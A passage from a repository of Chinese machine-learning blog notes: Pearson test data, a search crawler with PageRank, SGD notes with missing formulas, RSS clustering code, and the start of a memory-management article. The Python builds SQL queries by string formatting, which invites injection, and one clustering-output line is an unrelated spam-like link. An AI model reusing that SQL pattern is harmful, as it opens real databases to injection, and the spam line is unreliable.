Listener": 3.0, 51 | "You, Me and Dupree": 2.5 52 | }, 53 | "Michael Phillips": { 54 | "Lady in the Water": 2.5, 55 | "Snakes on a Plane": 3.0, 56 | "Superman Returns": 3.5, 57 | "The Night Listener": 4.0 58 | }, 59 | "Mick LaSalle": { 60 | "Just My Luck": 2.0, 61 | "Lady in the Water": 3.0, 62 | "Snakes on a Plane": 4.0, 63 | "Superman Returns": 3.0, 64 | "The Night Listener": 3.0, 65 | "You, Me and Dupree": 2.0 66 | }, 67 | "Toby": { 68 | "Snakes on a Plane": 4.5, 69 | "Superman Returns": 4.0, 70 | "You, Me and Dupree": 1.0 71 | } 72 | } 73 | ``` 74 |   测试数据 75 | ```json 76 | { 77 | "Claudia Puig": { 78 | "Gene Seymour": 0.26747360685805954, 79 | "Jack Matthews": 0.2569179867629838, 80 | "Lisa Rose": 0.7203602702251998, 81 | "Michael Phillips": 0.5412073589719606, 82 | "Mick LaSalle": 0.2318104592769826, 83 | "Toby": 0.2651650429449559 84 | }, 85 | "Gene Seymour": { 86 | "Claudia Puig": 0.26747360685805954, 87 | "Jack Matthews": 0.9804777648345675, 88 | "Lisa Rose": 0.396059017190669, 89 | "Michael Phillips": 0.5251050315105037, 90 | "Mick LaSalle": 0.4117647058823524, 91 | "Toby": 0.643567982536105 92 | }, 93 | "Jack Matthews": { 94 | "Claudia Puig": 0.2569179867629838, 95 | "Gene Seymour": 0.9804777648345675, 96 | "Lisa Rose": 0.4195906791483465, 97 | "Michael Phillips": 0.18171094607790858, 98 | "Mick LaSalle": 0.5484028176193337, 99 | "Toby": 0.826839467166564 100 | }, 101 | "Lisa Rose": { 102 | "Claudia Puig": 0.7203602702251998, 103 | "Gene Seymour": 0.396059017190669, 104 | "Jack Matthews": 0.4195906791483465, 105 | "Michael Phillips": 0.5303300858899116, 106 | "Mick LaSalle": 0.594088525786004, 107 | "Toby": 0.8622074921564968 108 | }, 109 | "Michael Phillips": { 110 | "Claudia Puig": 0.5412073589719606, 111 | "Gene Seymour": 0.5251050315105037, 112 | "Jack Matthews": 0.18171094607790858, 113 | "Lisa Rose": 0.5303300858899116, 114 | "Mick LaSalle": 0.7351470441147054, 115 | "Toby": 0.33995005182504257 116 | }, 117 | "Mick LaSalle": { 118 | "Claudia Puig": 
0.2318104592769826, 119 | "Gene Seymour": 0.4117647058823524, 120 | "Jack Matthews": 0.5484028176193337, 121 | "Lisa Rose": 0.594088525786004, 122 | "Michael Phillips": 0.7351470441147054, 123 | "Toby": 0.7223722252956285 124 | }, 125 | "Toby": { 126 | "Claudia Puig": 0.2651650429449559, 127 | "Gene Seymour": 0.643567982536105, 128 | "Jack Matthews": 0.826839467166564, 129 | "Lisa Rose": 0.8622074921564968, 130 | "Michael Phillips": 0.33995005182504257, 131 | "Mick LaSalle": 0.7223722252956285 132 | } 133 | } 134 | ``` 135 |   Pearson得分 136 |   [测试源码](https://github.com/linghuazaii/Machine-Learning/blob/master/recommendation/pearson_correlation.py) 137 | 138 | ### Reference 139 | - [Covariance](https://en.wikipedia.org/wiki/Covariance) 140 | - [Standard deviation](https://en.wikipedia.org/wiki/Standard_deviation) 141 | - [Pearson correlation coefficient](https://en.wikipedia.org/wiki/Pearson_correlation_coefficient) 142 | 143 | ### Note 144 |   大学浪费了不少时光啊,暂时不更了,补一补`probability and statistics`。 145 |   **GOOD LUCK, HAVE FUN!** 146 | -------------------------------------------------------------------------------- /machine-learning-search-and-rank.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Search And Rank 2 | ================================= 3 | 4 | ### Note 5 |   本文所有代码来自于`Colletive Intelligence`,我只是做一些归纳总结,以及把代码敲一遍~ 6 | 7 | ### Search 8 |   做Search的第一步是爬虫,怎么爬取所有的域名的所有数据,暂时遗留成一个问题,以后做爬虫的话会解决这个以及更多的细节问题。爬虫无非就是下载源网页,将所有的页面建立Index。这里就涉及到网页的结构化解析,以及更重要的关键字提取。引文里涉及的关键字提取比较简单,更复杂的技术性问题先遗留下来,以后研究NLP的时候再解决细节问题。所有的索引都建立好了,下面就是Ranking的问题。 9 | 10 | ### Rank 11 |   Query这一层也有关键词提取,引文的例子比较简单,更复杂的语义分析留到以后研究NLP再解决。引文给的例子我在代码里只实现了前几个,因为最后两个需要再次重建数据,非常的耗时。其一是计算词频打score,其二是计算关键词出现的位置打score,越靠前匹配度越高,其三是句子拆分成关键词,多词查询的时候根据关键词间的距离来打score,距离越近匹配度越高,其四是根据Page Rank算法来打score,得出的是由外链点击进来的Probability,其五是根据链接里是否含有关键词来打score,含有的匹配度更高,其六是最重要的,更具用户对搜索结果的点击数据来做Neural Network,这个以后研究的话再深究。 12 | 13 | ### 其他问题 14 |   
Google那么大的搜索量级的数据能做到那么快的展示,虽然线下做训练,但是线上做一些预测还有其他一些算法也得耗时不少吧,怎么做到那么快的response,如果以后有机会做搜索再深究。 15 | 16 | ### 代码 17 | [searchengine.py](https://github.com/linghuazaii/Machine-Learning/blob/master/search_and_rank/searchengine.py) 18 | [search_index.db](https://github.com/linghuazaii/Machine-Learning/blob/master/search_and_rank/search_index.db) 19 | ```python 20 | import urllib2, re 21 | import BeautifulSoup as bsoup 22 | from urlparse import urljoin 23 | from pysqlite2 import dbapi2 as sqlite 24 | 25 | ignore_words = set(['the', 'of', 'to', 'and', 'a', 'in', 'is', 'it']) 26 | 27 | class crawler: 28 | def __init__(self, dbname): 29 | self.con = sqlite.connect(dbname) 30 | 31 | def __del__(self): 32 | self.con.close() 33 | 34 | def db_commit(self): 35 | self.con.commit() 36 | 37 | def get_entry_id(self, table, field, value, create_new = True): 38 | cur = self.con.execute('select rowid from %s where %s=\'%s\'' % (table, field, value)) 39 | res = cur.fetchone() 40 | if res == None: 41 | cur = self.con.execute('insert into %s (%s) values (\'%s\')' % (table, field, value)) 42 | return cur.lastrowid 43 | else: 44 | return res[0] 45 | 46 | def add_to_index(self, url, soup): 47 | if self.is_indexed(url): 48 | return 49 | print "Indexing %s" % url 50 | text = self.get_text_only(soup) 51 | words = self.separate_words(text) 52 | urlid = self.get_entry_id('urllist', 'url', url) 53 | for i in range(len(words)): 54 | word = words[i] 55 | if word in ignore_words: 56 | continue 57 | wordid = self.get_entry_id('wordlist', 'word', word) 58 | self.con.execute('insert into wordlocation(urlid,wordid,location)\ 59 | values (%d,%d,%d)' % (urlid, wordid, i)) 60 | 61 | def get_text_only(self, soup): 62 | v = soup.string 63 | if v == None: 64 | c = soup.contents 65 | result_text = '' 66 | for t in c: 67 | subtext = self.get_text_only(t) 68 | result_text += subtext + '\n' 69 | return result_text 70 | else: 71 | return v.strip() 72 | 73 | def separate_words(self, text): 74 | splitter = 
re.compile('\\W*') 75 | return [s.lower() for s in splitter.split(text) if s != ''] 76 | 77 | def is_indexed(self, url): 78 | res = self.con.execute('select rowid from urllist where url=\'%s\'' % url).fetchone() 79 | if res != None: 80 | rs = self.con.execute('select * from wordlocation where urlid=%d' % res[0]).fetchone() 81 | if rs != None: 82 | return True 83 | return False 84 | 85 | def add_link_ref(self, url_from, url_to, link_text): 86 | fromid = self.get_entry_id('urllist', 'url', url_from) 87 | toid = self.get_entry_id('urllist', 'url', url_to) 88 | self.con.execute('insert into link values(%d, %d)' % (fromid, toid)) 89 | 90 | def crawl(self, pages, depth = 2): 91 | for i in range(depth): 92 | new_pages = set() 93 | for page in pages: 94 | try: 95 | doc = urllib2.urlopen(page) 96 | except Exception as e: 97 | print "can't open %s (%s)" % (page, e) 98 | continue 99 | soup = bsoup.BeautifulSoup(doc.read()) 100 | self.add_to_index(page, soup) 101 | #print soup.prettify() 102 | 103 | links = soup('a') 104 | for link in links: 105 | if ('href' in dict(link.attrs)): 106 | url = urljoin(page, link['href']) 107 | if url.find('\'') != -1: 108 | continue 109 | url = url.split('#')[0] 110 | if url[0:4] == 'http' and not self.is_indexed(url): 111 | new_pages.add(url) 112 | link_text = self.get_text_only(link) 113 | self.add_link_ref(page, url, link_text) 114 | self.db_commit() 115 | pages = new_pages 116 | 117 | def create_index_tables(self): 118 | try: 119 | self.con.execute('drop table if exists urllist') 120 | self.con.execute('drop table if exists wordlist') 121 | self.con.execute('drop table if exists wordlocation') 122 | self.con.execute('drop table if exists link') 123 | self.con.execute('drop table if exists linwords') 124 | self.con.execute('create table urllist(url)') 125 | self.con.execute('create table wordlist(word)') 126 | self.con.execute('create table wordlocation(urlid,wordid,location)') 127 | self.con.execute('create table link(fromid integer,toid 
integer)') 128 | self.con.execute('create table linkwords(wordid,linkid)') 129 | self.con.execute('create index wordidx on wordlist(word)') 130 | self.con.execute('create index urlidx on urllist(url)') 131 | self.con.execute('create index wordurlidx on wordlocation(wordid)') 132 | self.con.execute('create index urltoindx on link(toid)') 133 | self.con.execute('create index urlfromidx on link(fromid)') 134 | self.db_commit() 135 | except Exception as e: 136 | print e 137 | 138 | def calculate_page_rank(self, iterations = 20): 139 | self.con.execute('drop table if exists pagerank') 140 | self.con.execute('create table pagerank(urlid primary key, score)') 141 | self.con.execute('insert into pagerank select rowid, 1.0 from urllist') 142 | self.db_commit() 143 | 144 | for i in range(iterations): 145 | print "Iteration %d" % i 146 | for (urlid,) in self.con.execute('select rowid from urllist'): 147 | pr = 0.15 148 | for (linker, ) in self.con.execute('select distinct fromid from link where toid=%d' % urlid): 149 | linking_pr = self.con.execute('select score from pagerank where urlid=%d' % linker).fetchone()[0] 150 | linking_count = self.con.execute('select count(*) from link where fromid=%d' % linker).fetchone()[0] 151 | pr += 0.85 * (linking_pr / linking_count) 152 | self.con.execute('update pagerank set score=%f where urlid=%d' % (pr, urlid)) 153 | self.db_commit() 154 | 155 | class searcher: 156 | def __init__(self, dbname): 157 | self.con = sqlite.connect(dbname) 158 | 159 | def __del__(self): 160 | self.con.close() 161 | 162 | def get_match_rows(self, q): 163 | field_list = 'w0.urlid' 164 | table_list = '' 165 | clause_list = '' 166 | word_ids = [] 167 | 168 | words = q.split(' ') 169 | tablenumber = 0 170 | 171 | for word in words: 172 | wordrow = self.con.execute('select rowid from wordlist where word=\'%s\'' % word).fetchone() 173 | if wordrow != None: 174 | wordid = wordrow[0] 175 | word_ids.append(wordid) 176 | if tablenumber > 0: 177 | table_list += ',' 178 | 
clause_list += ' and ' 179 | clause_list += 'w%d.urlid=w%d.urlid and ' % (tablenumber - 1, tablenumber) 180 | field_list += ',w%d.location' % tablenumber 181 | table_list += 'wordlocation w%d' % tablenumber 182 | clause_list += 'w%d.wordid=%d' % (tablenumber, wordid) 183 | tablenumber += 1 184 | fullquery = 'select %s from %s where %s' % (field_list, table_list, clause_list) 185 | #print fullquery 186 | cur = self.con.execute(fullquery) 187 | rows = [row for row in cur] 188 | 189 | return rows, word_ids 190 | 191 | def get_scored_list(self, rows, wordids): 192 | total_scores = dict([(row[0], 0) for row in rows]) 193 | 194 | #weights = [(1.0, self.frequency_score(rows))] 195 | #weights = [(1.0, self.location_score(rows))] 196 | weights = [(1.5, self.location_score(rows)), (1.0, self.frequency_score(rows)), 197 | (1.0, self.distance_score(rows)), (1.5, self.page_rank_score(rows))] 198 | 199 | for (weight, scores) in weights: 200 | for url in total_scores: 201 | total_scores[url] += weight * scores[url] 202 | 203 | return total_scores 204 | 205 | def get_url_name(self, rowid): 206 | return self.con.execute('select url from urllist where rowid=%d' % rowid).fetchone()[0] 207 | 208 | def query(self, q): 209 | rows, wordids = self.get_match_rows(q) 210 | scores = self.get_scored_list(rows, wordids) 211 | ranked_scores = sorted([(score, url) for (url, score) in scores.items()], reverse = 1) 212 | for (score, urlid) in ranked_scores[0:10]: 213 | print '%f\t%s' % (score, self.get_url_name(urlid)) 214 | 215 | def normalize_scores(self, scores, small_is_better = 0): 216 | vsmall = 0.00001 217 | if small_is_better: 218 | min_score = min(scores.values()) 219 | return dict([(u, float(min_score) / max(vsmall, l)) for (u, l) in scores.items()]) 220 | else: 221 | max_score = max(scores.values()) 222 | if max_score == 0: 223 | max_score = vsmall 224 | return dict([(u, float(c) / max_score) for (u, c) in scores.items()]) 225 | 226 | def frequency_score(self, rows): 227 | counts = 
dict([(row[0], 0) for row in rows]) 228 | for row in rows: 229 | counts[row[0]] += 1 230 | return self.normalize_scores(counts) 231 | 232 | def location_score(self, rows): 233 | locations = dict([(row[0], 1000000) for row in rows]) 234 | for row in rows: 235 | loc = sum(row[1:]) 236 | if loc < locations[row[0]]: 237 | locations[row[0]] = loc 238 | return self.normalize_scores(locations, small_is_better =1) 239 | 240 | def distance_score(self, rows): 241 | if len(rows[0]) <= 2: 242 | return dict([(row[0], 1.0) for row in rows]) 243 | 244 | min_distance = dict([(row[0], 1000000) for row in rows]) 245 | 246 | for row in rows: 247 | dist = sum([abs(row[i] - row[i - 1]) for i in range(2, len(row))]) 248 | if dist < min_distance[row[0]]: 249 | min_distance[row[0]] = dist 250 | return self.normalize_scores(min_distance, small_is_better = 1) 251 | 252 | def inbound_link_score(self, rows): 253 | unique_urls = set([row[0] for row in rows]) 254 | inbound_count = dict([(u, self.con.excute('select count(*) from link where toid=%d' % u).fetchone()[0]) for u in unique_urls]) 255 | 256 | return self.normalize_scores(inbound_count) 257 | 258 | def page_rank_score(self, rows): 259 | page_ranks = dict([(row[0], self.con.execute('select score from pagerank where urlid=%d' % row[0]).fetchone()[0]) for row in rows]) 260 | max_rank = max(page_ranks.values()) 261 | normalized_scores = dict([(u, float(l) / max_rank) for (u, l) in page_ranks.items()]) 262 | return normalized_scores 263 | 264 | if __name__ == '__main__': 265 | spider = crawler('search_index.db') 266 | #spider.create_index_tables() 267 | #spider.crawl(['https://en.wikipedia.org/wiki/Concurrency_pattern']) 268 | #spider.calculate_page_rank() 269 | search = searcher('search_index.db') 270 | search.query('parallel programming') 271 | ``` 272 |   代码以`https://en.wikipedia.org/wiki/Concurrency_pattern`为例子,爬取连接大概有16000多条,建立索引和建立Page Rank数据得耗费近一两个小时,比较慢,这里有现成的数据。如果需要爬另外的数据,改下代码就可以。以下是搜索`parallel programming`的结果: 273 | ``` 274 | 
4.272585 https://en.wikipedia.org/wiki/Join-pattern 275 | 3.500800 https://en.wikipedia.org/wiki/Multi-threaded 276 | 3.218709 https://en.wikipedia.org/wiki/Software_design_pattern 277 | 3.189411 https://en.wikipedia.org/wiki/Ralph_Johnson_(computer_scientist) 278 | 2.995677 https://en.wikipedia.org/wiki/Thread_pool_pattern 279 | 2.962206 https://en.wikipedia.org/wiki/Design_pattern_(computer_science) 280 | 2.638868 https://en.wikipedia.org/wiki/Barrier_(computer_science) 281 | 2.569933 http://www.se-radio.net/2006/09/episode-29-concurrency-pt-3/ 282 | 2.313369 https://en.wikipedia.org/wiki/Category:Software_design_patterns 283 | 2.280730 https://en.wikipedia.org/wiki/Category:Concurrent_computing 284 | ``` 285 |   结果还是比较靠谱的~ 286 | 287 | ### 小结 288 |   **GOOD LUCK, HAVE FUN!** 289 | -------------------------------------------------------------------------------- /machine-learning-stochastic-gradient-descent.md: -------------------------------------------------------------------------------- 1 | Stochastic Gradient Descent 2 | =========================== 3 | 4 | ### Neural Networks 5 |   Neural Networks是挺有意思的,如果你先前没有了解过,我给你推荐以下的资源: 6 | - [Andrew NG. 
Machine Learning Coursera](https://www.coursera.org/learn/machine-learning/home/welcome) 7 | - [Raúl Rojas Neural Networks](https://page.mi.fu-berlin.de/rojas/neural/neuron.pdf) 8 | - [Neural Networks And Deep Learning](http://neuralnetworksanddeeplearning.com) 9 | 10 |   如果你想对Neural Networks有一个直观的感受,可以在这里体验一下Neural Networks Classification: 11 | - [A Neural Network Playground](http://playground.tensorflow.org) 12 | 13 |   个人推荐先去Rojas的Neural Networks里了解下Neural Networks的发展,在此之前你得先学习一下Andrew NG的Coursera课程的Linear Regression,Logistic Regression和Neural Networks。Andrew NG的课程有些东西的来由并未说明,这时需要你去拓展,其一是写代码直观感受,其二是Rojas的Neural Networks追本溯源,其三是Michael Nielsen的Neural Networks And Deep Learning一步步优化Neural Networks做[MNIST](http://yann.lecun.com/exdb/mnist/)识别。但是本文不牵扯Neural Networks本身的细节,只说Stochastic Gradient Descent。 14 | 15 | ### Stochastic Gradient Descent 16 |   就由MSE来做Cost函数,因为简单也易于理解,缺点也很明显,受异常值的影响比较大。 17 |   18 |   其中w表示weight,b表示bias。 19 |   20 |   其中v(1...n)表示bias和weight的向量。 21 |   22 |   23 |   如果`△v=-η▽C`,那么: 24 |   25 |   其中η就是learning rate,由上式可知,对于MSE来说,如果η取值合理,Cost会一直下降,直到得到一个最优的解。如果η取值过大,最终不会找到最优解,反而会跨过最优解一直反弹;如果η取值太小,迭代次数会更多,导致计算量变大,这个算是Gradient Descent的由来。 26 |   27 |   对于Neural Networks来说,一般数据量都是非常大的,所以每次计算所有数据的gradient是一个很大的消耗,所以就有了Stochastic Gradient Descent: 28 |   29 |   把n个数据以m大小均分,将会得到`n/m`个mini batch,对每个batch做Gradient Descent直到处理完所有数据,每一次对所有数据的处理为一次迭代,经过多次迭代达到最优解。 30 | 31 | ### 小结 32 |   Learning is fun. **GOOD LUCK, HAVE FUN!** 33 | -------------------------------------------------------------------------------- /machine-learning-word-vector.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Word Vector 2 | ============================= 3 | 4 | ### 回顾 5 |   前面说过Pearson Correlation,用来计算两个矩阵的相似度,本章Word Vector里面使用Pearson计算矩阵相似度。 6 | 7 | ### 原理 8 |   给定两份文档如何确定其相似度?这个问题可以延伸到:如何确定抓取的几篇文章是相似的,以作相关推荐?如何确定微博上的两个博主具有共同的话题,观念,爱好?或者如何确定几个博客博主是同一类型的,比如说作家,程序员? 
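  针对第一个问题(两份文档的相似度),下面给出一个极简的sketch:先把文档切成词频向量,再用前一篇介绍的Pearson Correlation打分。其中词表`vocab`和三段文本都是随意构造的假设数据:

```python
from collections import Counter

# 把文本按词表vocab转成词频向量
def word_vector(text, vocab):
    counts = Counter(text.lower().split())
    return [counts[w] for w in vocab]

# Pearson Correlation, 与前一篇的公式一致
def pearson(v1, v2):
    n = float(len(v1))
    sum1, sum2 = sum(v1), sum(v2)
    sum1sq = sum(x * x for x in v1)
    sum2sq = sum(x * x for x in v2)
    psum = sum(x * y for x, y in zip(v1, v2))
    num = psum - sum1 * sum2 / n
    den = ((sum1sq - sum1 ** 2 / n) * (sum2sq - sum2 ** 2 / n)) ** 0.5
    return num / den if den else 0.0

vocab = ['python', 'code', 'server', 'news', 'sports']
a = word_vector('python code python server code', vocab)
b = word_vector('code python python code server', vocab)
c = word_vector('news sports news news sports', vocab)
# a和b谈论相同话题, 得分接近1; a和c话题不同, 得分为负
```

  两段技术文本的得分为`1.0`,技术文本和新闻文本的得分则是负值,即行为相反,这与下文对关键词矩阵做层层合并的做法是同一个度量。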
9 |   Word Vector,从给定的文档里提取一定数目的关键词,形成矩阵。提取关键词的依据当然有很多(本章的例子比较简单),例如高频词`the`, `an`, `is`等等,短语`go to`, `want to`等等,以及词性做一个筛选,最终留下的词作为关键词。 10 |   然后通过上一篇的Pearson Score来计算距离,举个例子,我收集了50个博主的博客文章,然后统计了300个关键词,这样就有了50个1x300的矩阵,Word Vector总是选择距离最近的两个矩阵合为一个,知道最终只剩下一个矩阵。如图: 11 |     12 | 13 | ### 例子 14 |   我选取了RSS FEED做例子,最终结果为相似的RSS FEED会被归到一块儿。 15 | [feedlist.txt](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/feedlist.txt) 16 | ``` 17 | http://www.cbn.com/cbnnews/world/feed/ 18 | http://feeds.reuters.com/Reuters/worldNews 19 | http://feeds.bbci.co.uk/news/rss.xml 20 | http://news.sky.com/sky-news/rss/home/rss.xml 21 | http://www.cbn.com/cbnnews/us/feed/ 22 | http://feeds.reuters.com/Reuters/domesticNews 23 | http://news.yahoo.com/rss/ 24 | ..... 25 | ``` 26 | 27 | [generate_feed_vector.py](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/generate_feed_vector.py) 28 | ```python 29 | #!/bin/env python 30 | # -*- coding: utf-8 -*- 31 | # This file is auto-generated.Edit it at your own peril. 
32 | import feedparser 33 | import re, sys 34 | 35 | reload(sys) 36 | sys.setdefaultencoding('utf-8') 37 | 38 | def get_words(html): 39 | txt = re.compile(r'<[^>]+>').sub('', html) 40 | words = re.compile(r'[^A-Z^a-z]+').split(txt) 41 | 42 | return [word.lower() for word in words if word != ''] 43 | 44 | def get_word_count(url): 45 | doc = feedparser.parse(url) 46 | #print doc 47 | wc = {} 48 | 49 | for e in doc.entries: 50 | if 'summary' in e: 51 | summary = e.summary 52 | else: 53 | summary = e.description 54 | words = get_words(e.title + ' ' + summary) 55 | for word in words: 56 | wc.setdefault(word, 0) 57 | wc[word] += 1 58 | 59 | return doc.feed.title, wc 60 | 61 | def create_word_vector(): 62 | apcount = {} 63 | word_counts = {} 64 | for feedurl in file('feedlist.txt'): 65 | try: 66 | title, wc = get_word_count(feedurl) 67 | word_counts[title] = wc 68 | for word, count in wc.items(): 69 | apcount.setdefault(word, 0) 70 | if count > 1: 71 | apcount[word] += 1 72 | except Exception as e: 73 | print "failed for feed %s" % feedurl 74 | continue 75 | wordlist = [] 76 | for w, bc in apcount.items(): 77 | frac = float(bc) / len(word_counts) 78 | if frac > 0.1 and frac < 0.5: 79 | wordlist.append(w) 80 | 81 | out = file('blogdata.txt', 'w+') 82 | out.write('Blog') 83 | for word in wordlist: 84 | out.write('\t%s ' % word) 85 | out.write("\n") 86 | for blog, wc in word_counts.items(): 87 | out.write(blog) 88 | for word in wordlist: 89 | if word in wc: 90 | out.write("\t%d" % wc[word]) 91 | else: 92 | out.write('\t0') 93 | out.write('\n') 94 | 95 | def main(): 96 | create_word_vector() 97 | 98 | if __name__ == "__main__": 99 | main() 100 | ``` 101 | 102 | [clusters.py](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/clusters.py) 103 | ```python 104 | #!/bin/env python 105 | # -*- coding: utf-8 -*- 106 | # This file is auto-generated.Edit it at your own peril. 
107 | from math import sqrt 108 | 109 | def readfile(filename): 110 | lines = [line for line in file(filename)] 111 | colnames = lines[0].strip().split('\t')[1:] 112 | rownames = [] 113 | data = [] 114 | for line in lines[1:]: 115 | p = line.strip().split('\t') 116 | rownames.append(p[0]) 117 | data.append([float(i) for i in p[1:]]) 118 | 119 | return rownames, colnames, data 120 | 121 | def pearson(v1, v2): 122 | sum1 = sum(v1) 123 | sum2 = sum(v2) 124 | 125 | sum1Sq = sum([pow(v, 2) for v in v1]) 126 | sum2Sq = sum([pow(v, 2) for v in v2]) 127 | 128 | pSum = sum([v1[i] * v2[i] for i in range(len(v1))]) 129 | num = pSum - (sum1 * sum2 / len(v1)) 130 | den = sqrt((sum1Sq - pow(sum1, 2) / len(v1)) * (sum2Sq - pow(sum2, 2) / len(v1))) 131 | if den == 0: 132 | return 0 133 | 134 | return 1.0 - num / den 135 | 136 | class bicluster: 137 | def __init__(self, vec, left = None, right = None, distance = 0.0, id = None): 138 | self.left = left 139 | self.right = right 140 | self.vec = vec 141 | self.id = id 142 | self.distance = distance 143 | 144 | def hcluster(rows, distance = pearson): 145 | distances = {} 146 | current_clust_id = -1 147 | clust = [bicluster(rows[i], id = i) for i in range(len(rows))] 148 | while len(clust) > 1: 149 | lowest_pair = (0, 1) 150 | closest = distance(clust[0].vec, clust[1].vec) 151 | for i in range(len(clust)): 152 | for j in range(i + 1, len(clust)): 153 | if (clust[i].id, clust[j].id) not in distances: 154 | distances[(clust[i].id, clust[j].id)] = distance(clust[i].vec, clust[j].vec) 155 | d = distances[(clust[i].id, clust[j].id)] 156 | if d < closest: 157 | closest = d 158 | lowest_pair = (i, j) 159 | mergevec = [(clust[lowest_pair[0]].vec[i] + clust[lowest_pair[1]].vec[i]) / 2.0 for i in range(len(clust[0].vec))] 160 | new_cluster = bicluster(mergevec, left = clust[lowest_pair[0]], right = clust[lowest_pair[1]], distance = closest, id = current_clust_id) 161 | current_clust_id -= 1 162 | new_clust = [clust[i] for i in range(len(clust)) 
if i not in (lowest_pair[0], lowest_pair[1])] 163 | clust = new_clust 164 | clust.append(new_cluster) 165 | #print "clust len: %s" % len(clust) 166 | #print "clust id: %s" % clust[0].id 167 | return clust[0] 168 | 169 | def print_cluster(clust, labels = None, n = 0): 170 | for i in range(n): 171 | print ' ', 172 | if clust.id < 0: 173 | print '-' 174 | else: 175 | if labels == None: 176 | print clust.id 177 | else: 178 | print labels[clust.id] 179 | if clust.left != None: 180 | print_cluster(clust.left, labels = labels, n = n + 1) 181 | if clust.right != None: 182 | print_cluster(clust.right, labels = labels, n = n + 1) 183 | 184 | def create_cluster(): 185 | blognames, words, data = readfile('blogdata.txt') 186 | clust = hcluster(data) 187 | print_cluster(clust, labels = blognames) 188 | 189 | def main(): 190 | create_cluster() 191 | 192 | if __name__ == "__main__": 193 | main() 194 | ``` 195 | 196 | **Result** 197 | ``` 198 | - 199 | - 200 | - 201 | The Daily Puppy | Pictures of Puppies 202 | David Kleinert Photography 203 | - 204 | NASA Image of the Day 205 | - 206 | Utah Jazz 207 | - 208 | - 209 | Dictionary.com Word of the Day 210 | - 211 | Resources » Surfnetkids 212 | Utah.gov News Provider 213 | - 214 | - 215 | WIRED 216 | - 217 | NOVA | PBS 218 | - 219 | Latest News Articles from Techworld 220 | - 221 | BBC News - Business 222 | - 223 | - 224 | - 225 | PCWorld 226 | Macworld 227 | - 228 | Animal of the day 229 | - 230 | Nature - Issue - nature.com science feeds 231 | Latest Science News -- ScienceDaily 232 | - 233 | Technology : NPR 234 | - 235 | BBC News - Technology 236 | NYT > Technology 237 | - 238 | UEN News 239 | - 240 | Education : NPR 241 | - 242 | - 243 | AP Top Sports News at 2:56 a.m. 
EDT 244 | - 245 | Latest News 246 | NYT > Sports 247 | - 248 | - 249 | Movies : NPR 250 | - 251 | Arts & Life : NPR 252 | Fresh Air : NPR 253 | - 254 | - 255 | FRONTLINE - Latest Stories 256 | - 257 | Utah 258 | - 259 | - 260 | Utah - The Salt Lake Tribune 261 | KSL / Utah / Local Stories 262 | - 263 | Yahoo News - Latest News & Headlines 264 | - 265 | NYT > Home Page 266 | - 267 | - 268 | Reuters: U.S. 269 | - 270 | Reuters: Top News 271 | Reuters: World News 272 | - 273 | AP Top Science News at 6:06 a.m. EDT 274 | - 275 | BBC News - US & Canada 276 | CNN.com - RSS Channel - HP Hero 277 | - 278 | AP Top U.S. News at 3:16 a.m. EDT 279 | - 280 | BBC News - Home 281 | News : NPR 282 | - 283 | Techlearning RSS Feed 284 | - 285 | CBNNews.com 286 | - 287 | GANNETT Syndication Service 288 | - 289 | ASCD SmartBrief 290 | sites.google.com/view/kamagratablette/ 291 | ``` 292 |   可以看到,最终结果还凑合,如果关键词选取的更细致的话,那么结果将会更加准确。 293 | 294 | ### Reference 295 | - [Programming Collective Intelligence](http://shop.oreilly.com/product/9780596529321.do) 296 | 297 | ### Note 298 |   **GOOD LUCK, HAVE FUN!** 299 | -------------------------------------------------------------------------------- /memory-management.md: -------------------------------------------------------------------------------- 1 | Memory management every engineer need to know! 2 | ============================================== 3 | 4 | ## Prepare reading 5 | ### relevant reading: 6 | - [Anatomy of a Program in Memory](http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/)
7 | - [How the Kernel Manages Your Memory](http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/)
8 |
9 | 10 |    

11 | When the system boots, the **kernel** and the other startup processes are loaded into `physical memory`. On a 32-bit system, a process gets a 4G `virtual memory` space when it starts. Say I am a process called `Nerd`: at startup the **kernel** hands me the picture above and says: the `User Mode Space` you may use is only `3G`; `0xc0000000` through `0xffffffff` are kernel addresses, hands off, you have no permission there. The relationship between `physical memory` and `virtual memory` is this: `physical memory` is **mapped** into `virtual memory` one PAGE at a time, and the **kernel** manages all the `page_table`s, so when too many programs are running, `physical memory` gets tight, yet every newly started process still sees 4G of `virtual memory`. The `resident memory` shown by `top -p ` is the `physical memory` a process actually consumes, which is very handy when hunting a `memory leak`. (**TIP**: for a pure C program, turning on `mtrace()` gives you a leak report, or you can build your own checker with `__malloc_hook` and friends.) All in all, `virtual memory` is just a currency the **kernel** issues to each process; allocate too much `physical memory` and inflation sets in, and the currency issued to my `Nerd` process loses value. Whatever, I'm a `Nerd` anyway.
12 |
13 | 14 |    

15 | A `process switch` works by swapping out the `virtual memory` context: each running process keeps its own `resident memory` in `physical memory`, so the switch only saves and restores the `virtual memory` state, the **kernel** state, register values, and other per-process bookkeeping. A `thread`, on the other hand, shares the process's `TEXT`, `DATA`, and `BSS` segments and the `HEAP`, which is why a `thread switch` is much cheaper than a `process switch`.
16 |
17 | 18 |    

19 | In more detail, `virtual memory` looks like this. The `TEXT` segment holds all the code. The `DATA` segment holds all initialized `global variables`; for example, with `const char *msg="I am a nerd!"`, the pointer `msg` lives in the `DATA` segment. The `BSS` segment holds all uninitialized `global variables`, with the memory zero-filled, so a bare `const char *msg` goes into `BSS` and certainly does not point at `"I am a nerd!"`; it points at `NULL`. A `memory allocator` can be implemented in two ways: one is the `brk()` system call (**TIPS**: `sbrk()` calls `brk()`), the other is `mmap()` with `ANONYMOUS` mappings or `/dev/zero` (a `calloc()` implemented over `mmap()` works this way). `brk()` grows from the `program break` toward higher addresses (**TIPS**: `sbrk(0)` returns the current `program break`; any read or write past the `program break` is an `illegal access`). For example, `sbrk(4096)` requests `4K` of memory, and `sbrk(-4096)` releases `4K`, moving the `program break` down by `4096` (**TIPS**: some platforms do not support passing a negative value to `sbrk()`). Memory obtained with `mmap()` is handed out from high addresses downward. As for the `stack`: `ulimit -s` shows the maximum stack size in KB, usually `8192`, i.e. `8M`, so be careful with recursive algorithms; it is easy to cause a `stack overflow`. One nice property of the `stack` is that frequently used `location`s on it are likely to be `mirror`ed into the CPU `L1 cache`, but don't rely on this completely, since it is not under our control, and over-use easily causes `stack overflow`. 